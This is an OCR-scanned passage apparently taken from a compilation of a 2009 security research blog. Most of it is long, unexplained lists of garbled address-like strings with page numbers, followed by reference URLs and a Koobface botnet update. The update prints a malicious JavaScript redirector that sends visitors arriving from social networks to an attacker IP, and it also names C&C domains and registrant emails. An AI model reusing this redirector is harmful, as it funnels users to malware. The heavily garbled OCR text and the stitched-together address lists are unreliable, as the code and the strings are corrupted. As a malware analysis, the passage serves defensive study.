17rptykwnKZLmdcZilv6VqQVPkTCCoAmtc 
17Rq2HZCsETuYKUawL9E8JV2TUDXm1jrHX 
17RQ9qb2wHGhWkKscjUWuLEsXDLxDnprFyB 
17rsjin58zVyoGUXKSFhyt6DHeNbazoa6 
17rTGdD5X4bSKw9DAQzqDJF7T7JoMxLkyA 
17Rtgv8i7jYSBXWmFqugBJLRZVN8qVPd7b 
17RtiuhSonBf4uDbHVWSrmA6HWAjzpAiK1 
17Rue2wU69jo6rZxPb6rue4Dbfck3QX pfW 
17RV8jXwwkiZD6PkKeHPhFA7wMJXFexfD35 
17RwbyWkJjJN8ti6qSRJAq2o09Eki 7CSpHnD 
17rXqFthUVuE97zdhc32jcjiRcoBmznBEW 
17ry3ABTctw59nzSqNqGijfmLfEAVxVcop 
17RY86svhpbVQv2AokjxeilpcDvbRSxrd 
17s2bNNJcvVB4jwmDNumd8ot5zGhcv2Qsk 


25381 


17saLrxiF8KKJw6AvHvzvKhgEBqBz5348X 
17sCoMfJWKf24CUQ63ETjc5q3TjqkcZpBK 
17sCY3VsDGntrFU814jHmm6vSdVab9LzgH 
17scYTwfUR5Dejzg8WctQhPMHZi5tPcyma 
17sDdBGoM2Dwvs1z1imvVjhbJ5TvG5qlqHJm 
17SDyMVKUA4ZnESjQiaRT7W22e7r7gVA2v 
17sFEHvtTWjAjp8t7 NvbbnqqebxNQmLPef 
17SfYEra8Qw98mfaqJbunbKTRIeG3VYQqEFF 
17SH3FNuj2Bsb6shLE6Qd3Z7jnsYrVSF1g 
17SJRKj3Q5PnHvKyUoSM409tLMhv5e8T3s 
17sKfw652CBLBagjMxXiZEzfButdwYeFBJ6 
17sLadjSoUF2eT6swz1LZ7TjPAdo68CL94 
17sLMd57tfESZaYbogRvhsUFWNReX84jvF 
17smC1JSaGvdx7JZCsNhfLdDGZV1mnpoBA 
17SQKSTzVyMyzsLZ3XeSPEACdigCdyAS8Pi 
17sqopnvDxmFHsVYdAtLMEwhcxXzkXruT7m 
17Sr9gXEeaDjBYeCW183yBGr6VjQfD36vN 
17SrtgweG7dmUjxBAPwPxeialA8wnNb3Hq 
17ssaL5PDbsZswVaKNou4pGEkwP1ZeEjs7 
17SuCUQFSdr867hisJTNi3w7XGXzproNhH 
17SumbAubNzmLmeDwYZRHUQSQs1826YKLj 
17suZeamsPgTmfzN7xswfyqPK255p6W96n 
17SVFCf2WHNAGTPeuySZuhyY 76aWYEz24Xc 
17sxeMD8JrZkC5rrQdmECoxX3Xshv4MBq5N 
17sXpdzjWNjJPqT9AKPYwFevYA2D9T4kY 
17SyDqNucZUsyM1XqJbEnB9p9SWecmxqqa 
17sz4jN8JNUXBXNSNLT36nbquTuGX6s2yT 
17sZ7MMHME2V9ett]JeLqgQFzRPsnsUb1wr 
17t2tsxe8wWo801YG5CnRAujitRfv2n6Bi 
17T38jN8cNZ9e7KnBS84TS4SrWA2kN6naU 
17T39CCONFHXCU3Z7PKiVR71tzhuVx2y6q 
17T6UdH5Bs8KowuVE92HLb3qiMCMTGFh9h 
17t7F216L4h82J54YkGQaMYie23E28E8uk 
17T8j6yVduuvqicKHAb1JDRc7hTaSjwtBA 
17t8LZULt]jNGFwvBWmiULHRs8d3jfXU3Ax 
25382 


18. 
19. 

20. 

21. 


22. http://1.bp.blogspot.com/_wICHhTiQmrA/Sog6gXyvxAI /AAAAAAAAEDO/OLtMdWv_3Mg/s1600-h/blackhat_seo_tax_latest 


15_LIVE_obfuscation. JP 


23. http://ddanchev. blogspot . com/2009/06/from-ukrainian-blackhat-seo-gang-with_09.htm 


24. http://ddanchev. blogspot . com/2009/06/peek- inside-managed-blackhat-seo.htm 


25. http: //ddanchev. blogspot . com/2009/05/dissecting-swine-flu-black-seo-campaign. htm 
26 
27. http://ddanchev. blogspot . com/2009/06/from-ukrainian-blackhat-seo-gang-with. html 
28. http: //ddanchev. blogspot . com/2009/06/from-ukrainian-blackhat-seo-gang-with_09.htm 


29. http: //ddanchev. blogspot . com/2009/06/from-ukraine-with-scareware-serving .htm 
30. http://ddanchev. blogspot . com/2009/07/from-ukraine-with-bogus-twitter.htm 


31. http://ddanchev. blogspot . com/2009/06/fake-web-hosting-provider-front-end-to.htm 


32. http://ddanchev.blogspot.com/ 


5.8.10 Movement on the Koobface Front - Part Two (2009-08-19 11:27) 


// KROTEG 
War abcl = ‘http://85.234.141.92/redirectsoft/go/*; 
ar abc2 » ‘http://85.234.141.92/redirectsoft/qgo/'; 
ver ss = '" + location.search: 
if ((location.search).length>0) abc = abci; else abc = abc2; 


var redirects = [ 
{"facebook.com’, abc+'fb.php'], 


"tagged.com’, abc+'tg.php"], 
*friendster.com’,abc+'fr.php'], 
{‘myspace.com', abc+'ms.php"j, 


‘msplinks.com’, abc+'ms.php"], 
"myyearbook.com',abc+"yb.php"], 

{*fubar.com', abc+'fu.php’], 

*twitter.com’, abc+'tw.php"], 

{'hiS.com', abc+'hiS.php'], 

*bebo.com’, abc+'be.php"] 

}; 

var s = ‘'' + document.referrer, r = false; 

for (var i = 0; i < redirects.length;: i ++) { 

if ((s.indexOf(redirects{i}(0}) ‘= -1)) { 

ver redir=redirects[{i] [1] + location.search: 
if ((location.search).length>0) redir=redir+'cdomain="+location.host; else redir=eredir+' ?domain="+location.host; 
location.href = redir; 

r= true; 


break; 


} 
} 


if ('r) location.href = abc+'index.php’+ location. search; 


UPDATE13: The domain snimka31082009 .com has been suspended. Just like the domains 
listed in UPDATE11, it’s worth pointing out that once the PrivacyProtect.org whois records 
return to their original state, all of the domains are registered using the name Rancho Ranchev 


2541 


17tADye7yWwbv7dbYmj23RWqHCRsYyyjkW 
17tCPkfi9uSNiIZQM89uUEjxPkbjfqa7V1ha 
17teB1Mk3LF5SnmCbgBK8e5Utv9SHMmVyPc 
17TGFD7JjP3rYoYXxn5k9PqKPJDJVQGLYv 
17TgFQqurkG1ze4aHzj W9mxXjekywvPoHk5 
17TgpT4BGbyss6hVKK6DFZTZoUvYDjL8c8 
17tJqH2VCpb4LgZzqwLCyYe]8cz8mtpprDz 
17tkcPlujrZ5yC2YUmiZvWhE7gs5Lfivsq 
17TkyqnkbTBstB4dj1pvt6GK8WciTL862s 
17tm9XkKMNJMBZEQMkK4nQpM24eww 7 rxTfaf 
17TmrfBEWgXhW3DC9IWw/7sobsD8rUb6TMS 
17TnC4JNUnG8urdPDeYtESuQ3SNHFRyLQo 
17tnMeCxDXn8QDG6PPZxzsSNNh9YJYrDjA3 
17TpKWVhrAUKCrpYpu5SEZfCzbdg9Zabo6 
17tPURRFshlwyNT6zDAhjJGm2pn6AydcWk 
17tpvCk4YDU3Pm2kRWMjVSAgjRRGZVBUa5 
17trjU21MSwuxEgLcQ6dpRmUzxX3SREco3 
17tSRu28bp7evFZU5MbzwxdbB7hEvbFG74 
17ttjFeuut1l3hr7CfCuxQqZAU5JvNkq7Tx 
17TubDswcDZSXjekiT537jwtVqFUMPtMMe 
17TU0OEUXhHAMMAkArMKUZKemVYiihxGGYR99 
17tv95YBrAhco4jMpHo4hPiFAEozJAUNaz 
17tvpCyEV7g99K9txhK29Ju9DLI1qymdMUY 
17tVpxpPQiamw7XYQsRPZrpo8PbiSidFVn 
17TYmr8uDBn5Ksrd1GVA3SneBJDGx9phsA 
17Typf3L9TAtj8WTwtRaz1ZXnDq8o0q3Xxs 
17u5AmZNzYv4in85rjEnAY8vo6vTJ8bBK 
17U6fnT82drLTJ2tsGmnxFxHAu2VZQ79LX 
17u7VoaoGLAe8hKUfXPdPCWsBSTMPnWqVn 
17u8PJJiyEtYSF26rYKj3aHrzwxoewj2)J7 
17U95Ryb8bdJcoNUEKRyo1VtUBuYLo62Qv 
17U9VhmdZKFfsm4DUQktEyuZXyMfSpJ27z 
17UB49EX3ZGwWkKKVKVFHtK2RsBJLtRj7Ztz 
17UCdAh1n9c6rxLifHw3F6YL5Xi3wUjxhu 
17UC)xNbd1TVsTmXQ4cmi2MW1DAatNKnFr 


25383 


17ufkNtSzcnnXzFnjN7vPC56Q4Fh2gwuPk 
17ufVXjpxBK5KX7ti9LeTjJUGdFYjxDMHkw 
17UGLoVNmxZSLaHVoApz2sT2YLsgFJm3VC 
17UgtAYEUtLR7T5gvwUA1lizeNopEumnv5e 
17UGzy2DTFfffSu2CM1zonmrpDxhSNCY2u 
17ujHj7k5sVXcL1JUd9WUv8nVfwuR1C4n1 
17ujR4mW9sjKE9xPQ83coZ7Umal74CKKjb 
17UL3ekRCgHNh3Eets8 TcfK8THjX837bmY 
17umGaLJRjp3z1X6T)/GdR3vRNTbewDooCx 
17UMqz6GS356fY5d5Rw9SFQWLnPRmZLTPM 
17UpGrsSobdyLLz1WVJyA5a1zJdU5d6efXx 
17USaCxNeyqlNwco8X9aDCnGsFfx9XruSj 
17utNEWCxEZuiKibjGyMcashygv5ap8dST 
17Utp6tJBoUa38SX1rvatrYx6FsfQdkq8st 
17UVRXQ5o0MsbAwy1bXBCcnTjNtXKsw4uGf 
17UWgP1bKS7ySm6rwVUfwHnsrNGzPgtPhp 
17uwRcKAhgD]V19qg5XyZV8Q|JDQFQwCjiN1 
17UWu7rUaka2QV16XZDUXxXON75kr9UB3G4 
17UxMDmtwA9w6duFCAFQqMi7Se5sgPREe8 
17UyLhZtVaNWcVXXwBwaowndD2xXeP]xVY 
17uyXJiUzoUZJgPe3wzYpCFgANrxxrxrYc 
17V1zyB68KS9JC5uteGwMjff7133Baed2a 
17V26Anzv9GcLjewivBqM2LzbhtP4jpmqH 
17V2g8u2sHqgrK8CePpqSMZLKLNQ8V7q1f 
17v4jWcVdbxLGuFiEruW9UKiKmBj9VQJsm 
17v5ZN3vaDM8DjvpMxSeSr7iitBDBUUuQXX 
17V7fAfAfG5Le6B33Ahal1r88gakfx9bRcf 
17vV9NN72LJKPqfcFUqgBADBUGGe14PUCNGp 
17vaB42Gk1h1Z4wkL9fipxXZuC2YbfK9tfX 
17VBaBNQ5jxhF9jdMFMuaiavBF42qPCgbp 
17vBffkXuJSkVNbSoiISQCVPF9LYxXyULwz 
17VbK7KABxqDDxNYnr4V9VAkJ2dZ7QZw4P 
17VbN6fDBo4DWzo8VjpqgQwSBpBsxxe8bY 
17vegJgEd5ovnwUv8HrQ9E6ynhTMCkVFLJ 
17VEUqmfGQ65jonRoefUXYxzhUS9Fm1UZr 
25384 


17VFLFLx9nkNSQWqrNm3bsihb8HNr/7fiRr 
17VizhBmMWjL6QNQCZ2H9eNDIBRC74FR8Me 
17vJhpNjEAajRR860DThhkglyZG3zPyHQE 
17VJP4kKbM11YKZZM7z2VEFPYiC4hQQ6k287 
17VKK6YNroBWiQYnAGyudn2g98TvHewh3p 
17vL1Y7kCtcEBnREtiV78Ko19L7sCGWJTy 
17vobZtPyGQ4qZuhvRNdkYTtvcwCmcMp4A 
17VpztCC6hmRLRhw2fnU3tmZzMWXNLSYV58 
17VqecM1XN9R9KQO46fgyhw5sxNqHdYt6Pm 
17VrgL4JzLuMJ7B4c1M69igKit3WmgeiZZ 
17Vs2peecjKH27NN202FtVEE8qNccpb1bf 
17VUDz3Cwn1lva4JWD3A2EK9vaViirTj9dt 
17VWcotA8WqaUTBUCo6UXPrjGBacfrydpD 
17vxC695FijY4CNmcZSpEPhpUWZFSWVEf5 
17w8JNLgJTuF5LpfDzfcjn48tru4Ca2qwgq 
17w9bMf2DEcDUbpfVFodb34LpJShHdCTRv 
17WcZ4NTDdUjLLJLfPrsStUJdBuKVkufpP 
17WD9UKMNgNLyavue5EQ7kdYfRwp226uCi 
17WdSgCDjRTYivsW2H3zZMyXskWX3Xh4Dau 
17wEKaEuFoDy6iDuLNmftVtidYj3685S41 
17WES7psPRH7V3UrUmJcUBeo9EnUvnSV6R 
17WeuCbRAz4n9DwHvZ7sWajubQE3tGruHk 
17wF5L78SNbo9N2fEnNZHY7tLB 7j8vhj5g 
17wfmG8XkdTq4VYhwDz3whMQg9xaLx3Bp5 
17whJhrSPeEqBwR7njmsT9yXRVpeBCatws 
17WjW1BHbzo9KZRn4dzUu2bTM5P2AGjfBs 
17wKwTSKdtRkWbfvwsZtwPxakddbPbMXM3 
17wPKJ88eqFk6EYAZFuv Lhzcja2ojrmdNF 
17WpzrGMHPX8YNB7v7dXFWAU9aVPfDXD11 
17wVNUn4ukWHTx7eFtFADHQIGMOWUqUoFK 
17wwB3fzFd7FZ8atBdVABjxTfpGCQYyZEF 
17wXL6aEFzoi9PLjJNS5SLSgUXjd5Gn5yuHhV 
17wxYPBkz68iVYF53cFYt24cgY9RCZNTMc 
17wY3u9KSqVasQg2HtmwQg2zZAAMWbZ5kYT 
1L7WZAjVZXKJXWqCQMRG4sSYKGMXF9JguVD9 


25385 


17wzaRgZNRQENswSQwYQCkd6EzUJScSRN4 
1L7WzpHWUieCfWYQZKYGXWmhdetUrfPa9H5 
1L7WZXL1ZYjK3ABJBEGXbV2F2QjXc6PwoUm 
17x7stEHuAw2kXQyhnUnxEzcchXMeRw7VR 
17x8ccFJ8uyTQ8R7GQhUUD2TGu2u2aC6B4 
17X9WCNRnGapctvqwvRdUDAfXmKxTsE9P9 
17xbU8qSDf7LxFNRMwrX53JX4PgjoupM68 
17xcbr3qqMVR5gG6DAfmZUQgjR5 TaGjoTs 
17xDvdSSDBGHGf2wiQK3EPXXJ5Y¥mtmemW7 
17XeUcbdAUJs9SZuaPr7wwYoVDJpU3sCDD 
17XfFyZxavUfx6cUAGG93iXRic2wtExQsu 
17xhPSYVFhRrsxWmX1pizKHmutCRHD33g6 
17XiuEzby16D6ysjJjCPUXCZnKXxT9kCEiu 
17XkBazcV8ZEV8EofEDEnx6Cg5aR86UAyC 
17XkXCADMhBhP9S16cWtjLkXWEAgbYQkZ7 
17xm9Bb25zNF6duTkAAalgajsDE2puayUe 
17Xnfq4WGHH8A2eYmnTBP7ZY7pWwv99ndvf 
17XP762X7hEU71k7ahJtcEgT2Fpfjt7SL2 
17XRsPXP9EMPBAiT9dwnmk3YKVegb4517M 
17Xu6f|SvpwCB4muopgk2uvw4vdbiJ97zp 
17xw6Nn5njze9fR7 LPHWTipQSo2kK5sh6p 
17xxlagpyyLabH1crohH5ZiBiFhiuT58cZ 
17xybuQso3hCgau55gMy2YjJfnkz7eDrkGZ 
17XYeHBUVGnfSMmU1kPDICWDVgAtqNfAU 
17XYwrQFWYcpaPB8Rf9HVFpngkGLKs6waq 
17Y3A55sPEXQDUUMXq2xtEJ91yLnQLzLC) 
17y4FZtLVKvxY4DMakvDHhnHmmcGAPse8sK 
17Y86WFMvMUFYtVmsKy1QPDA9ZrpRvxxnY 
17Y96mayhiL83yQE2gzGswRwz5vRMW2M8j 
17YAPRLx2euiMEabscTpNnTqf6kCY81HbXx 
17YbpEuv7TmZcam937dfzPTn8ZxYjxw7Ns 
17yeKQXdGpFBCfksdWTESEAD16iUrsAryi 
17YeVGhbcBss5MecrgzaqAFK4dqAEes5uB 
17YfGxfpx1zcSkXMHvG6a9eefh1pf7yLEt 
17YfKubCNB787RFfKSGjJVNNx6yKm1bvZ8K 
25386 


17YfLHqJkdPnpZbD3YAtW3LINRszpmv2j8 
17YHFKWwMaG61f6k7H6AmHsy6slexKbpaA 
17yieVstASWWBGVPHkKG4fLUDk3RCvzEmsZ 
17YLfoeZS9SkYyWDyZpL2N59zXffsS5Wijs 
17Yn4CqhoMdR2zqpAddP6GZHT6DzjDYh4o0 
17yNZP4GqjSG5Dt6p5CZC1gp1UKGZTQAL3 
17YPhHNHtcaVQkpNNZY64K763HdydbBVPP 
17Yqh3mHsbc8qFnY¥mdYMGRdqdDHKA2byQE 
17yT5hzQftsfCXj8XnCAe2cA2wkKCgcgailj 
17yTcXRQ7JvoRWgn5Yn3nyKPK2Vw9DD6Rs 
17YUEVBcXvuHufAysfnjRobuh6zn2tNmmRq 
17YuQawJwm8RLuCpVxm6V7TbRjwa7HbCfN 
17YUZuUUYfft3d4f]bAmTeNCt30hW4FNii3 
17YxuFeqfl1WbGFErHKprosYzDjmoevpeF1 
17YZAnYgbe452rexjVEPovom6K3am2A8w8 
17yZW82d74hyQQWTVcRX4WhYRkgZWJrpjV 
17z2cmgCnLGe4X5iW8DWogyPeQg3nugvYe 
17Z8uSMQNwWUmW1cDAR8WfM1al1b1VbmuDsa 
17ZB4HwWCHZXCIGWZRu6RYLtXBKb3scnfMT 
17ZCSvJoQyWTPuB39RpD2sBBMah6ApAsPY 
17ZdXBb3CHPwxpiabjQtqkojvxRRleyFEF 
17ZEMR6RbwjDRrBgXiPvtpCMEyxVffPxeM 
17ZeZuUKkmShGaWZM69bacwgNGYXKTEps 
17Zh2n3nDYVKWW8zxbJUjt4npQL7 UUWWIf 
17ziDjJ4mcYEMdTjTgNWAJsvsFEy7BRGrtF 
17ZjE6PZKvsHoGbxjv3WjnsBNyRKaZrwA2 
17ZJr7yAkosM29f6PhUhHvaU3Y15YKNrvL 
17ZKGNjGmmm9GcgPrbRq5zJSBBUoIYxwsz 
17ZLTCnehfkDRduNXoNi67AnbPJo5AMmLQ 
17zo2svVhSvsr1D7295paNvifimadorn18 
17zomVXc7YKw3VKnfmZUZZGQJLSU1LF8pr 
17zqKdJuBTN7hYk7QyQa29nNKGkk69Qpdw 
17ZRH7VBWMHYJQE1ldzdWCrJzziuklLUbBd1 
17ZSDVp6N9rEss3wtCXFLsng9dFA6MKrXxg 
17ZSZnUpNg5orSJoWvh2HU6DAgHByqGDXH 


25387 


17zTPYhozpeWjsTJazjFEDT4JuhgiVGEPM 
17zuLgMDUkypWRzFC3WpBMoceZj6961eRa 
17ZvHicccwcUb1NaigC3sAUWmLpLP8PBwb 
17zVoiUtwTZJTKZrVQ}JypieWHcXwQJpAgk 
17zWi8i37 RUWTiCtnPquHFeBgfYVpWYc92 
17ZXEpVbcVW9gEB1XTieHjZA7 1tkHL3V3f 
17ZXmzPMDsGP5NWZ82NtitusGizb6McohE 
17ZXYZndM6yfjLb5kDwsvKZznKMzVp]JY5Qc 
17zzyoDhSTkLAyt4P7NEYrcgXvwsR1uBin 
1816VhTDkXvL8WE2HKYUMbXh3L9UZpiiM3 
1817t51n57uDc66EwAal 9wLbj2typebBVn 
181dTMytYQupsGN3Xd7S5tf35FxQiMxTyk 
181FNT6LLT12pPh4asbssaRqhb4U 7LWiaf 
181KHLGoQRPBMsxXSwV2tzbfLedSHt6KfKv 
181ki6EZZCjJFHYQRIbDHCdoSZ5GbvWF5tAr 
181mCvyYiDfqiBj8fWggnkwxTB7Fbh1FdUV 
181NAudcUANV39pKTTW2fUpU4xcHpzMFU9 
181Tek6iGrzna4nFWRgV5pPRHa5YmwPDd4 
181tmaDA4gvG929X3cgKAzvrYoKUURXYH8 
181 TNCMnCLtvpNHxGyfLJXdWhggzY6JQci 
181uabXSsnicaqLmeMtMJK961DGtbzitSp 
181YNBF1llyWQhwx2WfxeKNFvGPWcLgyB4M 
181lyv33YLZCE8JWWqFHDX8NnseCftnrax6 
181lyZmEp6n5hxDkdvMJzvYNRi18G7x91zP 
18286XPM1QjHsRa3N7EE6qjXxpG5iUkp)Jw 
18292gWcY9PwSzJR5CNZRLDxeL9fmBqQKh 
1829E8cSNGMWJ8yjNcGKuMfgPXhQVvNhGW 
182cmMSE9G3uvs5Vd7M93HP4VKyJRinaEYa 
182EndVqtHMxGdzM8XCmoxX2PTG1laYB2qw}J 
182G5wBmvDuQGsoFk8Vwok5H3WuacL1SoE 
182ghiCQXTfqdQiYbY8RzbTq9XtD83MDGZ 
182iaRtAzdvRqZ8c1BCHJoZUgR4YgxUoXxs 
182iJcDdRnz6eG1irvKFUcxQEAeRR3XSinx 
182kXFGxvZ2ZBM1EV2Cmj4Qc6axkVYMmx36 
182P8DjgBS5spntsuRWvYbxMwdkjsa3qq)J 
25388 


182pwBikiLVL4fpfZTLONvaXFnqQ9hcBs 
182r7pxfkAWn64bcnFyvXVexEaSJMD8Vor 
182RFeJslqj8BC2AjTjeYtmVcFWvCzFahw 
182rLAL5VDEBK1YWKxh6R7DDfAzJ1F4A0oM 
182rsnz5QbBFB7goodS1QL8pemwePpvCng 
182sxLQziosaDFS1INcP4c2pNpg8zUV2tt9 
182TicM2Uhjx439tqJC2aeQw2zh2RBZMom 
182uMf9Lckxz4PP79aboMkxF2pyal1JpE1w 
182X81ZEk7ANmeLCULyfqnpFWHFWs5V1cH 
182ZGoYIYdAXYQAHZMzep4kUX8S2fqwTic 
1833RXnKhiIMBn3VSyPyc4BPhAKszjarxm 
1835NtXe2wSwdiJt8SMDhV6YXbct8ww4xXK 
1837T3673CUBBb4uTLwfuCbwEczpE3Es8N 
183bVfiat3BjZntkKuDAbi6HrF4aVhYXoOL2 
183FfUQTKKQo2XN94yiStNiE5675RqQHLD 
183gZK81vV6s7pbRACLZwig5Hjyqn2NhKx 
183H7Uc5KoZP5YuCk1bQMpAfAmeGS]Ruab 
183HyGnXGueLlpckp422gY6JP4Wi4DC8gF 
183mkUeEaDCSXCFPZMQ8PLaXCk24WY8Ws1 
183N9sqdCBCymoVx6gACWEDnxpXWgzc1Wk 
183RZpD89xQKPbBnn48E3yce34prvjJUps8x 
183saEU7pBj7GV8WX9tzoMiExsmjajAW3T 
183UzpVqaYzZNdWdiT lwez34TAcQjiredrc 
183vaGWRYStAlcKRRkxdvRaUmcSP5AVvgo 
183VROopEQgh9DMHYQgh107pJybAanRGhK 
183W8pW9G7j2qXFeoP84gN2uHKp5 1lutNG9 
183y8kxJ4h2Gb2zZwVX207TVezt7BcB50Py 
183yDJxzquLiLQqsgWR9dMarGhj8Uesvxm 
1841yVHpbbKugxLjYHKpSYMAJ2UwZ3Tda4 
18485zk4JaicGuoJjeyqSTjBrJB7 7M50MNM 
184AggvNgor8kKWLQmFCbjVYSSVL3DHEDpD7 
184DePMhBrfjkeLnrUsWfcukKs7cAHwvPLJ 
184jfpoN9gWyVkFh653chC6ovvFumL9y6mhW 
184jYiLPWgGtXymyXrbLMqmvDfpePzZEEgy 
184K2j6tzYRSy4wVU9VWJxoE9XTEv2bYkP 


25389 


184KqJ8ezeEAT 79XdfNRCxobJpTviTgY7N 
184kv7rfXNHDWWSV5tEHQJC634Xdzy9Xgw 
184TsZkV3SYNfP3NwW4xiHONKXR4AaA6CHS 
184vgZ2fFWFIZEZMEANWjTP30TT9JkGvZrqg 
184yt1TsQ28QGyc9xptRwK2pY9xaVCY1laH 
184Z1LtX8NkB6YqbqpFRuTb1gsqELVxyLw 
184Z2cX72MXSqfx2aCiroV6V9B72pL5YpK 
184ZYfzX8TLRAs7drVTeHn4KLdD6KAfhCG 
1853i9YVZEkxypK2MxFBhJFE9z5vVfr15z 
185AV71Nv7qPpdZPpw714bkMdnQjd8eQds 
185BAS3dmos5t2dc26wfCj71leLwAsMzj8q 
185bJ3YcF6moT44hwlka7U170TQdFXeaCD 
185etUpVatjbTBOXKFTMUX5NDJXEFPJYHT 
185Hg8LZTj/KSR4U2QETnNHhZSDWKaGXAyYK 
185HtGUJseLhPh5immCMctm2wBVaQu3MTd 
185kKnz3M6iWHgTM9UZjabiz8 18wUNjx6f 
185kvnbnx7EDQErhPykKG3mUG3sD]mhrfRo 
185PyX5QuhPfWGjGGQDRTZhAzdvBezQ laf 
185qduAv8EUD8fg3m7RRSuUAjLYTVB4GJEd 
185QPodi3zaSVtBjJEGAALKT2sdycWxrByv 
185toApCeTjYXYKgFaY5ZyqQnHUxjJfC7ZE 
185ukVQ3aYRebPQ4dpaYJqGeEBcDsvTG42 
185vr6Q3wyFYVH5CtoPbkfDLh8MHHPxfe5 
185WmFF4Z2PbEh6V5VfvMqrxbeBa5W5KMy 
185WQXRPujF8y4LV8rlyTnnyS9knAVfNbZ 
185XYhBeiTwqj8FUMFsgdz1VVTWoMCnsg2 
185zNbpES8NSwmoBLsMsxBsBFVFu48Zpty 
1861EY16JMxi4CkfUZLAM8UYXLuJZtrRzc 
1865aQjzoSkxfMPkKLFCXxtfq3fyqjLs9vN 
18679JUB2qiPcFavkK5QA8UF9CGxmBobq2B 
186BprdLAbbyPcQryR4ZF5XciyJnt5AyD8 
186bWqwLkKjxTprSaUwecSWtuhio7jDE30R 
186iLwncRszwtzeVQdtsKL7eRHOE1SFNii 
186rDVnn8EENxirddvCNCPikeRr8NPJcRG 
186RRHMUsw9AKGm6GpEpr2ivWV5F17tHWx 
25390 


186tYttbPYUKBPP5prQCAc5gptjinDtiph 
186WoYSb7vGC9ZtmYRbo3EPQB44Qd7ZtNJ 
1874qZ6iWT6P6AJsuZWsaXH3CfdTjNcVY1 
187AErFnUTeftGv4avWALitcastU3vPWWT 
187Co1SJysvZNLZPRjJU4TMc1lmEaTtPZ17N 
187EeTKcgT 6aL6tGUDEtRBWPHRczBJU138 
187eqWYALHCXAYDH625Mp8zuhtVDfUFFEN 
187EUPEbT YerR8ckvK9aB2MgK8KWh6YKxd 
187FaLQwWON39AifYRHi4abQ1K10FkF6jpj 
187FWi9MGJ4N31hcY6YNK8L152C755HmquU 
187GEa3Gwwk7cpvjcboA8AhsLFi5bhbTq4 
187knhTnJqgTaRp5jLMQbvKXJdjjZbz9cgA 
187LFUAH9ySqyVDB4NGS2sdE0Z7kKp40xz 
187PYKu7Xrinsxt9vojynztKCiwWd74CTr 
187TekoGrMn5stsKWDj7dPvh5EnBSxfpeD 
187v1RpweakKsZmwZuYAQHGZW2S2jUHxYBA 
187VeTqVgjs4KxVGjBob47KuwA6kKC3MTbE 
187vZJbbrvXgNhFkf544bzbrxN8s6huLhc 
187wprVoCRcAsqQq6iTiM69zhhbqQZTCwN 
187X8mScvBdmfYDUhuqwv4C9BvPCjzdCgq 
188bH9OTgCZ1ZWL2FZDwxXjDC9XWzukjthUG 
188Cz5c6lat8nDjGhVKijuocBgpSP1jSFS 
188ePTfY4Z8B4iIMWQeb5YPbodnTLDmz9xi 
188gHNsK3Xki9J8caKENGeU3SrWRMKXEVW 
188KCWDC3BCRZ6CB7F9g6dAsYwTfBDXyr9 
188KV6WwX7gCtEATfXk1ELGectRAnzXx6Pr 
188mJfPhZZh5AajpY7dS5Drt9tBWaqPrcAw 
188Qw1co2YQWgPw5yqoLy5GWdZRaPQnFkn 
188tVUhAsS6HilLuHRqZ1U1ktR8BYCZFib5A 
188xExKW3peNxtjsdnzwrEB8uDJveq58uQ 
188yKN9kk3AHreVn7PF16svvW29UpNUp9P 
188ZWPYdWMT1GfYPYQdBwcZQE463ng2FGW 
1894kdwkZcrrgUu5AjdPqapLZg6Spgswg3o0 
1898NPS2mLGSvjxDpXLt2U77iStSkWFTSm 
189BGKyEVm9mbx3mYyCvZhxwPAGau3E7nP 


25391 


189CKKQHnpn2uGT4giNgKqpDzr7y2i5fy} 
189DqCQbxp6Njwe67Q4Bs9Qk2jKwNs26Un 
189ejZ21Py3cVu44tvtiLZYebX 7tdEGnv1 
189gkNUsjHrgok33vgZ5Aure4EzE1Z44BF 
189hkVCK633b14HYjmKfPP3LjJMDRSipvXj 
189n7Gyjzcj6HThVgeeBtSj3qog5FWUdjs 
189rgaVv2nGNdJM4CoYfx37AGa8XCjxEdU 
189RrLhyPpd5oh2iNx7ib4fvKfzZrBURV9 
189SKnSqr6bEVYbS4DAo0aXSPwFW5SSWbCt 
189veff 1RHtECvjb8XwTjaU8st]wK4VFyN 
189ViyYq8JsSYarvHXJ4MpkfVa7qZU9trU 
189x3FMjnmHpHX6B3AgdKy6EomcSWUvoNK 
189xqsD5DQ7PRqkhrkgbWEVaZezLzwT YRk 
18A2Qfey4isP4XHe5rtHaJyo8wb5BzGnvE 
18A5UCq9aqoTQCy4YrpUV96DTzcaoXGxh4 
18A64YWHnqTf97yLcbBvAbsuLpEnfARzh7 
18A6b9ThoBmXk7EJ7b3CWriUYUK55hPRKm 
18a7Fj4LYUGuLhg9bNMWTYmAeFzZ4VZU3 fc 
18a7hq5TpatsVjfifXxq15D6BMNdMTpV9z2 
18A7kZU23Fb26RSaiCD9dax27bHjCcEHTXU 
18A895o0LsJOGFByHvPqMGtGgAKJ6q6bpqb3 
18a8FSyuUZEJhufvt9cXat7JoZzAynsggK 
18A97wy3js8EM4v5SKWH26VZoud7Nm2kT8 
1L8AA3bhjET4SsYyb504pEekVQv2VNuap14 
18aBPhp6pBk2y8QZ5dF5Agmy1KLxsvRYjv 
18AbtNthj7gXrgcYUgaVA6zhacpvN5RWS6 
18AdELYnrhDWe8rzdEMmFwrW7S loakqeu9 
18AEuStcsuvycDnEMxLiCGHbEqxZLm4aM7 
18AF9X6xZ4j35KkUyoJdDwTzZA6Wn9zho7U 
18AgtWoVw9USavWoRFwX8AZWVUGK3n7VBX 
18AH3qk6wmnKMim8qBxXJAUZuzZUZySKdQdk 
18AkPaLDqCB3HjvR766agzgFlnmqHmE8To 
18AmpbGKuDsHSdJ 7Cgz3kvcteAhpfedQwt 
18aonFaM5R6Cj7LPGyRDZrQtFJJS6oftfg 
18A0s3Rx72XdfZVRO6TMY GHYvkjGYRFy4H 
25392 


- from Ukraine with typosquatting. 


UPDATE12: A new Koobface domain is in circulation across Facebook - snimka31082009 
.com - snimka means photo - which redirects to the Chinese IP (China Railcom Guangdong 
Shenzhen Subbranch) offering hosting services for the Koobface gang as of last week - 
61.235.117.83 /redirectsoft/go/fb w.php. The snimka31082009.com domain is in a process 
of getting shut down. 


UPDATE11: The latest Koobface domains masa31082009 .com - Email: yxlvpe- 
woztjox@gmail.com; pari270809 .com - Email: baoyshzrcwmraq@gmail.com; rect08242009 
:com and suz11082009 .com have been suspended. 


The Koobface gang has also changed the C &C domain in their latest updated pushed 
throughout the past couple of days. Interestingly, it’s a [1]subdomain used in the Twit- 
ter campaign from July - cubman32 _ .net.ua/.sys/?action=Idgen &v=14 and cubman32 
-net.ua/.sys/?action=Idgen &f=0 &a=-531027389 &lang= &v=14 &c=0 &s=Id &l=1000 &ck=0 
